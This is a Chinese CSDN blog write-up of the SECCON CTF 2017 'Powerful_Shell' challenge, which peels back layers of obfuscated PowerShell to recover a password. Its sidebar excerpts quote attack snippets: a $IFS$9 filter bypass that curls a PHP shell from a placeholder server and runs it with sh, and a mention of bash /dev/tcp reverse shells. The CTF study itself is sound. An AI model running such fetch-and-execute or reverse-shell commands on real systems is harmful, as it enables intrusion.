SECCON CTF 2017 Powerful_Shell

最新推荐文章于 2024-07-19 15:36:44 发布
最新推荐文章于 2024-07-19 15:36:44 发布
阅读量1k 收藏
点赞数
分类专栏: 信息安全 CTF 逆向工程 文章标签: ctf seccon powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012763794/article/details/78778512
版权
信息安全 同时被 3 个专栏收录
49 篇文章 5 订阅
订阅专栏
CTF
15 篇文章 1 订阅
订阅专栏
逆向工程
15 篇文章 1 订阅
订阅专栏

打开一开始一堆变量赋值,而且很长

我们拖到最后,有个create执行脚本的东西,而且还是前面的变量

那我们用Write-Host输出这个变量

得到的是另一串powershell脚本

扣下来,其中下面这部分只是验证Host,我们并不需要,直接删掉

运行一下是弹钢琴的操作

那我们添加代码,输出被处理后的值

就图片上的字母,自己试就行

最终得出对应如下

h 440
j 493
k 523
f 349

按着secret的顺序输即可(输入顺序:hhjhhjhjkjhjhf)

又出来一串,一看就是十进制ascii

简单还原一下即可

结果又来一串

后来将\n去掉,发现还是powershell,可以执行,要我们输入密码

后来将这个代码以;分割,输出前面的东西

发现这几个东西代表0-9

后来发现后面用了管道符,iex将字符串当powershell执行,你输出最后的那个${;}就知道

那我将管道符及后面的删除,输出如下

我们将那些数字扣下来,用sublime批量编辑,很快搞掂,写一下脚本就好了

其实还有更方便的,再将后面的管道符和iex删掉,再执行就好了

giantbranch
关注
专栏目录
CTF-shell_exec-Wp
qq_28545703的博客
10-29 1485
CTF-shell_exec-Wp 题目是这样的,ping命令测试 查看html源代码看到一个tip 解题过程一 经过大量测试目的其实就是执行cat /flag 但是发现有过滤了空格,这里我们$IFS$9代替 我是利用echo curl http://xxxxx.com/1.php >a ,然后执行sh a这样拿shell的,需要绕过php 最终poc: #第一条,把vps的<?php system('cat /flag')>写进去a `echo$IFS$9curl$IFS$9112h
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3714
CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
CTFWP】ctfshow——web41
最新发布
LongL_GuYu的博客
07-19 719
ctfshow——web41解题
De1ctf - shell shell shell记录
weixin_30376453的博客
08-08 352
虽然是N1CTF原题,但是自己没遇见过,还是做的题少,记录一下吧== 1.源码泄露,直接可以下到所有源码,然后代码审计到一处insert型注入: 这里直接带入insert里面,跟进去看看 insert函数对values进行正则替换,先调用get_columnsp 这里把数组分成以` , `连接的字符串并且以`反引号包在内,而正则则是匹配字符串中所有反引号之间的内容,将其取...
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1651
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
CTF比赛时准备的一些shell命令
dfhz2014的博客
09-15 839
防御策略:sudo service apache2 start :set fileformat=unix1.写脚本关闭大部分服务,除了ssh 2.改root密码,禁用除了root之外的所有用户 sudo passwd root3.curl命令4.ssh 一秒开一秒关5.比赛开始就查看自己Linux,apache的版本,找到对应漏洞打上补丁 apache2ctl -...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
Seccon-CTF-2016-cheer_msg
02-24
样本来自2016年的Seccon ctf的一道pwn题,该题目使用了alloca内存分配函数,该函数不同于一般堆上的内存分配,而是在栈上进行。题解:https://blog.csdn.net/A951860555/article/details/114011564
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
CTF WEB】反序列化
weixin_30655569的博客
09-29 633
反序列化 漏洞代码 <?php error_reporting(0); if(empty($_GET['code'])) die(show_source(__FILE__)); class example { var $var='123'; function __destruct(){ $fb = fopen('./php.php',...
[CTF]反弹shell总结
cosmoslin的博客
11-11 4608
1 什么是反弹shell reverse shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 2 为什么要反弹shell 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。
SECCON CTF 2022 web复现
shinygod的博客
11-20 799
SECCON CTF 2022 web复现
(1)Shell 编程学习 Shell是什么?Shell的浅显原理 为什么要学Shell 及其第一个Shell脚本 CTF角度学习Shell
AAAAAAAAAAAA66的博客
12-25 1607
最近刷CTF题目的时候经常要用到Shell语言,但是自己并没有系统的学习,所以最近花了点时间学习一下,所以重新来梳理一下。对于稍微有一点编程语言基础的同学,能上手Shell其实不需要半小时(甚至更短),当然熟练运用还是需要积累的。 目录 Shell是什么? 主观定义 官方定义及原理 为什么要学Shell编程 第一个Shell脚本 CTF用到的shell Shell是什么? 主观定义 主观的来说:大家只要用过电脑,就接触到了Shell,比如说自己电脑打开win+r,打开cmd,虚..
SECCON-CTF-2014-Decrypt-It-easy
MangoFengC++
03-24 4940
题目 给了三个文件ecrypt1.bin,readme.txt,rnd 其中readme.txt: $ ./rnd crypt1.png ecrypt1.bin Solve 看到前面有一个$,猜测可能和linux系统有关,这一条信息有点像使用./目录下的rnd对crypt1.png进行某种操作,输出为ecrypt1.bin. file一下 file /home/mangofeng/桌面/rnd /home/mangofeng/桌面/rnd: ELF 32-bit LSB executable, Inte
Seccon-ctf-2016-pwn-cheer_msg 题解
lifanxin的博客
02-24 513
Write Up文件信息漏洞定位利用分析wp总结 文件信息 样本来自2016年Seccon ctf的一道pwn题–cheer_msg,同时这道题目也给了libc文件,减少了漏洞利用难度。 检查样本信息:   32位小端程序,开启了栈溢出保护和NX保护。 漏洞定位 整个程序还是比较易懂的,主体逻辑存在于main和message两个函数。上图展示了main函数的伪C代码,要求输入一个长度,然后按照长度进行相应计算后使用alloca在栈上分配空间。这到题目比价新颖的是使用了alloca函数,该函数不同于一般的
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 8715
BUUCTF题目Misc部分wp(持续更新)
[SECCON CTF 2022] 只两个小题pwn_koncha,rev_babycmp,crypto_pqpq
weixin_52640415的博客
11-14 999
SECCON CTF 2022
青少年CTF练习WP (持续更新)
HelloWrod6868的博客
02-22 764
青少年CTF练习平台wp
ctf_awd_platform
10-23
CTF(Capture The Flag)即夺旗赛,是一种网络安全竞赛形式。AWD(Attack-Defense)平台是一种特殊的CTF比赛平台,主要专注于攻击和防御的技能训练与比拼。 ctf_awd_platform是指一种特定的AWD平台,其目的是为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值